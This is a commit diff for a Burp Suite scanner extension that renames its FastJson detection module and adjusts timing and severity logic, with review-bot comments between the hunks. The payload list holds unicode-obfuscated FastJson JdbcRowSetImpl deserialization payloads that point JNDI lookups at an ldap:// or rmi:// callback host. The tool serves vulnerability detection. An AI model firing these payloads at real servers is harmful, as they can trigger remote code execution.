1,模块名称更改 2,显示优化
pmiaowu committed Jun 23, 2021
1 parent efc63ea commit 91e16d3
Showing 5 changed files with 107 additions and 98 deletions.
@@ -1,4 +1,4 @@
package burp.Application.FastJsonFingerprintDetection.ExtensionMethod;
package burp.Application.FastJsonDnsLogDetection.ExtensionMethod;

import java.io.PrintWriter;
import java.net.URL;
Expand All @@ -12,7 +12,7 @@
import burp.DnsLogModule.DnsLog;
import burp.Bootstrap.CustomHelpers;

public class FastJsonFingerprintType1 extends FastJsonFingerprintTypeAbstract {
public class FastJsonDnsLogType1 extends FastJsonDnsLogTypeAbstract {
private IBurpExtenderCallbacks callbacks;
private IExtensionHelpers helpers;

Expand All @@ -32,7 +32,7 @@ public class FastJsonFingerprintType1 extends FastJsonFingerprintTypeAbstract {
private ArrayList<String> dnsLogUrlArrayList = new ArrayList<String>();
private ArrayList<IHttpRequestResponse> httpRequestResponseArrayList = new ArrayList<IHttpRequestResponse>();

public FastJsonFingerprintType1(
public FastJsonDnsLogType1(
IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String[] payloads,
Expand All @@ -52,25 +52,25 @@ public FastJsonFingerprintType1(
this.startDate = startDate;
this.maxExecutionTime = maxExecutionTime;

this.setExtensionName("FastJsonFingerprintType1");
this.setExtensionName("FastJsonDnsLogType1");
this.registerExtension();

this.runExtension();
}

private void runExtension() {
if (this.payloads == null || this.payloads.length <= 0) {
throw new IllegalArgumentException("FastJson指纹识别扩展-要进行检测的payload不能为空, 请检查");
throw new IllegalArgumentException("FastJsonDnsLog识别扩展-要进行检测的payload不能为空, 请检查");
}

// FastJson指纹识别
// FastJsonDnsLog识别
for (String payload : this.payloads) {
// 说明接收到了dnslog请求确定是FastJson
if (this.isFastJsonFingerprint()) {
if (this.isFastJson()) {
return;
}

// 如果dnslog有内容但是 this.isFastJsonFingerprint() 为false
// 如果dnslog有内容但是 this.isFastJson() 为false
// 这可能是因为 请求发出去了 dnslog还没反应过来
// 这种情况后面的循环就没必要了, 退出该循环
// 等待二次验证即可
Expand All @@ -85,16 +85,16 @@ private void runExtension() {
int currentTime = this.customHelpers.getSecondTimestamp(new Date());
int runTime = currentTime - startTime;
if (runTime >= this.maxExecutionTime) {
throw new TaskTimeoutException("fastjson fingerprint scan task timeout");
throw new TaskTimeoutException("FastJson DnsLog scan task timeout");
}

this.fastJsonFingerprintDetection(payload);
this.fastJsonDnsLogDetection(payload);
}

// 防止因为dnslog卡导致没有检测到的问题, 这里进行二次检测, 保证不会漏报
// 睡眠一段时间, 给dnslog一个缓冲时间
try {
Thread.sleep(6000);
Thread.sleep(8000);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
Expand Down Expand Up @@ -123,10 +123,17 @@ private void runExtension() {
}

/**
* 指纹检测
* DnsLog检测
*/
private void fastJsonFingerprintDetection(String payload) {
String dnsLogUrl = this.customHelpers.randomStr(8) + "." + this.dnsLog.run().getTemporaryDomainName();
private void fastJsonDnsLogDetection(String payload) {
String dnsLogUrl = null;
if (payload.indexOf("ldap://") >= 1) {
dnsLogUrl = this.customHelpers.randomStr(8) + "." + "ldap" + "." + this.dnsLog.run().getTemporaryDomainName();
} else if (payload.indexOf("rmi://") >= 1) {
dnsLogUrl = this.customHelpers.randomStr(8) + "." + "rmi" + "." + this.dnsLog.run().getTemporaryDomainName();
} else {
dnsLogUrl = this.customHelpers.randomStr(8) + "." + this.dnsLog.run().getTemporaryDomainName();
}

// 发送请求
IHttpRequestResponse newHttpRequestResponse = this.makeHttpRequest(payload, dnsLogUrl);
Expand Down Expand Up @@ -214,22 +221,22 @@ private byte[] buildParameter(String payload, String dnsLogUrl) {
* 设置问题详情
*/
private void setIssuesDetail(IHttpRequestResponse httpRequestResponse, String dnsLogUrl) {
this.setFastJsonFingerprint();
this.setFastJson();
this.setHttpRequestResponse(httpRequestResponse);

this.sendDnsLogUrl = dnsLogUrl;
}

@Override
public IScanIssue export() {
if (!this.isFastJsonFingerprint()) {
if (!this.isFastJson()) {
return null;
}

IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();

String str1 = String.format("<br/>=============FastJsonFingerprintType1============<br/>");
String str1 = String.format("<br/>=============FastJsonDnsLogType1============<br/>");
String str2 = String.format("ExtensionMethod: %s <br/>", this.getExtensionName());
String str3 = String.format("sendDnsLogUrl: %s <br/>", this.sendDnsLogUrl);
String str4 = String.format("=====================================<br/>");
Expand All @@ -244,18 +251,23 @@ public IScanIssue export() {

String detail = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8;

String severity = "Medium";
if (str7.indexOf("ldap.") >= 1 || str7.indexOf("rmi.") >= 1) {
severity = "High";
}

return new CustomScanIssue(
newHttpRequestResponse.getHttpService(),
newHttpRequestUrl,
new IHttpRequestResponse[] { newHttpRequestResponse },
"FastJson",
detail,
"High");
severity);
}

@Override
public void consoleExport() {
if (!this.isFastJsonFingerprint()) {
if (!this.isFastJson()) {
return;
}

Expand All @@ -267,7 +279,7 @@ public void consoleExport() {
PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true);

stdout.println("");
stdout.println("===========FastJson指纹详情============");
stdout.println("===========FastJsonDnsLog模块详情============");
stdout.println("你好呀~ (≧ω≦*)喵~");
stdout.println("这边检测到有一个站点使用了 FastJson并且dns出网 喵~");
stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
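Review bot: In fastJsonDnsLogDetection the new `payload.indexOf("ldap://") >= 1` and `payload.indexOf("rmi://") >= 1` tests are off by one — a match at index 0 counts as absent — and `contains` states the intent directly; the same idiom reappears in export on the new `str7.indexOf("ldap.") >= 1 || str7.indexOf("rmi.") >= 1` severity test. The three near-identical branches can collapse to `String label = payload.contains("ldap://") ? "ldap." : payload.contains("rmi://") ? "rmi." : "";` followed by `String dnsLogUrl = this.customHelpers.randomStr(8) + "." + label + this.dnsLog.run().getTemporaryDomainName();`. The severity test also searches `str7`, which is assembled outside this hunk, for `"rmi."` and `"ldap."` without a leading dot, so if randomStr can end in those letters a random label (constructed example: `abcdermi.<dnslog domain>`) would be rated High; matching `".ldap."` / `".rmi."` on `this.sendDnsLogUrl`, which export already has in hand, avoids that and stops the severity from depending on a display string. The body of fastJsonDnsLogDetection continues past the hunk.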
@@ -1,17 +1,17 @@
package burp.Application.FastJsonFingerprintDetection.ExtensionMethod;
package burp.Application.FastJsonDnsLogDetection.ExtensionMethod;

import burp.IHttpRequestResponse;

/**
* FastJson指纹扩展的抽象类
* 所有的FastJson指纹检测的方法都要继承它并实现所有的接口
* FastJsonDnsLog扩展的抽象类
* 所有的FastJsonDnsLog检测的方法都要继承它并实现所有的接口
*/
abstract class FastJsonFingerprintTypeAbstract implements FastJsonFingerprintTypeInterface {
abstract class FastJsonDnsLogTypeAbstract implements FastJsonDnsLogTypeInterface {
private String extensionName = "";

private Boolean isRunExtension = false;

private Boolean isFastJsonFingerprint = false;
private Boolean isFastJson = false;

private String requestIssueName = "";
private String requestIssueValue = "";
Expand All @@ -24,7 +24,7 @@ abstract class FastJsonFingerprintTypeAbstract implements FastJsonFingerprintTyp
*/
protected void setExtensionName(String value) {
if (value == null || value.isEmpty()) {
throw new IllegalArgumentException("FastJson指纹扫描扩展-扩展名称不能为空");
throw new IllegalArgumentException("FastJsonDnsLog扫描扩展-扩展名称不能为空");
}
this.extensionName = value;
}
Expand All @@ -35,7 +35,7 @@ protected void setExtensionName(String value) {
*/
private void extensionNameCheck() {
if (this.extensionName == null || this.extensionName.isEmpty()) {
throw new IllegalArgumentException("请为该FastJson指纹扫描扩展-设置扩展名称");
throw new IllegalArgumentException("请为该FastJsonDnsLog扫描扩展-设置扩展名称");
}
}

Expand Down Expand Up @@ -64,7 +64,7 @@ protected void registerExtension() {
*/
private void registerExtensionCheck() {
if (!this.isRunExtension) {
throw new IllegalArgumentException("注意: 该指纹模块未注册,无法使用");
throw new IllegalArgumentException("注意: 该模块未注册,无法使用");
}
}

Expand All @@ -80,21 +80,21 @@ public Boolean isRunExtension() {
}

/**
* 设置为FastJson指纹
* 设置为FastJson
*/
protected void setFastJsonFingerprint() {
protected void setFastJson() {
this.registerExtensionCheck();
this.isFastJsonFingerprint = true;
this.isFastJson = true;
}

/**
* 是否FastJson框架
* @return Boolean
*/
@Override
public Boolean isFastJsonFingerprint() {
public Boolean isFastJson() {
this.registerExtensionCheck();
return this.isFastJsonFingerprint;
return this.isFastJson;
}

/**
@@ -1,18 +1,18 @@
package burp.Application.FastJsonFingerprintDetection.ExtensionMethod;
package burp.Application.FastJsonDnsLogDetection.ExtensionMethod;

import burp.IScanIssue;
import burp.IHttpRequestResponse;

/**
* fastjson指纹扩展的公共接口
* FastJsonDnsLog扩展的公共接口
* 所有的抽象类都要继承它并实现所有的接口
*/
public interface FastJsonFingerprintTypeInterface {
public interface FastJsonDnsLogTypeInterface {
String getExtensionName();

Boolean isRunExtension();

Boolean isFastJsonFingerprint();
Boolean isFastJson();

String getRequestIssueName();

@@ -1,14 +1,14 @@
package burp.Application.FastJsonFingerprintDetection;
package burp.Application.FastJsonDnsLogDetection;

import burp.Application.FastJsonFingerprintDetection.ExtensionMethod.*;
import burp.Application.FastJsonDnsLogDetection.ExtensionMethod.*;

import burp.Bootstrap.BurpAnalyzedRequest;
import burp.IBurpExtenderCallbacks;

import java.util.Date;

public class FastJsonFingerprint {
private FastJsonFingerprintTypeInterface fastJsonFingerprintType;
public class FastJsonDnsLog {
private FastJsonDnsLogTypeInterface fastJsonDnsLogType;

// 该模块启动日期
private Date startDate = new Date();
Expand All @@ -17,17 +17,17 @@ public class FastJsonFingerprint {
// 会根据payload的添加而添加
private int maxExecutionTime = 120;

public FastJsonFingerprint(
public FastJsonDnsLog(
IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String callClassName) {
this.init(callbacks, baseAnalyzedRequest, callClassName);
}

private FastJsonFingerprintTypeInterface init(IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String callClassName) {
String[] payloads = {
private FastJsonDnsLogTypeInterface init(IBurpExtenderCallbacks callbacks,
BurpAnalyzedRequest baseAnalyzedRequest,
String callClassName) {
String[] dnsLogPayloads = {
"{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao1\",\"autoCommit\":true}}",
"{\"name\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0043\\u006c\\u0061\\u0073\\u0073\",\"\\u0076\\u0061\\u006c\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\"},\"x\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"rmi://dnslog-url/miao2\",\"autoCommit\":true}}",
"{\"b\":{\"\\u0040\\u0074\\u0079\\u0070\\u0065\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u0072\\u006f\\u0077\\u0073\\u0065\\u0074\\u002e\\u004a\\u0064\\u0062\\u0063\\u0052\\u006f\\u0077\\u0053\\u0065\\u0074\\u0049\\u006d\\u0070\\u006c\",\"\\u0064\\u0061\\u0074\\u0061\\u0053\\u006f\\u0075\\u0072\\u0063\\u0065\\u004e\\u0061\\u006d\\u0065\":\"ldap://dnslog-url/miao3\",\"autoCommit\":true}}",
Expand All @@ -39,27 +39,28 @@ private FastJsonFingerprintTypeInterface init(IBurpExtenderCallbacks callbacks,
};

// 获得最终的程序最大执行时间
int keyLength = payloads.length;
int keyLength = dnsLogPayloads.length;
if (keyLength > 20) {
this.maxExecutionTime += (keyLength - 20) * 6;
}

if (callClassName.equals("FastJsonFingerprintType1")) {
FastJsonFingerprintType1 fastJsonFingerprintType = new FastJsonFingerprintType1(
// 使用dnslog判断是否是FastJson的方法
if (callClassName.equals("FastJsonDnsLogType1")) {
FastJsonDnsLogType1 fastJsonDnsLogType = new FastJsonDnsLogType1(
callbacks,
baseAnalyzedRequest,
payloads,
dnsLogPayloads,
this.startDate,
this.maxExecutionTime);
this.fastJsonFingerprintType = fastJsonFingerprintType;
return this.fastJsonFingerprintType;
this.fastJsonDnsLogType = fastJsonDnsLogType;
return this.fastJsonDnsLogType;
}

throw new IllegalArgumentException(
String.format("FastJson指纹识别模块-对不起您输入的 %s 扩展找不到", callClassName));
String.format("FastJsonDnsLog识别模块-对不起您输入的 %s 扩展找不到", callClassName));
}

public FastJsonFingerprintTypeInterface run() {
return this.fastJsonFingerprintType;
public FastJsonDnsLogTypeInterface run() {
return this.fastJsonDnsLogType;
}
}
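Review bot: The timeout budget in init, `this.maxExecutionTime += (keyLength - 20) * 6;` on a base of 120, keeps two unexplained magic numbers after the rename: nothing in this file says what a payload is expected to cost or that the figure is in seconds, while the value is actually consumed in FastJsonDnsLogType1, where runExtension compares elapsed time against it before each payload. Name the allowance, e.g. `private static final int SECONDS_PER_EXTRA_PAYLOAD = 6; // per-payload allowance beyond the first 20; must cover one request plus the dnslog check in FastJsonDnsLogType1`, and use it in the multiplication so the next change to the detection loop has something to update. The `dnsLogPayloads` literal would also be clearer as a `private static final` field with a one-line comment stating that `dnslog-url` is a placeholder substituted when the request is built, if that is what the Type1 class does — the substitution is not visible in this section. Separately, the constructor discards init's return value while init also assigns `this.fastJsonDnsLogType`; one of the two is redundant. init's body is split across two hunks, with the middle of the payload list outside the section.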
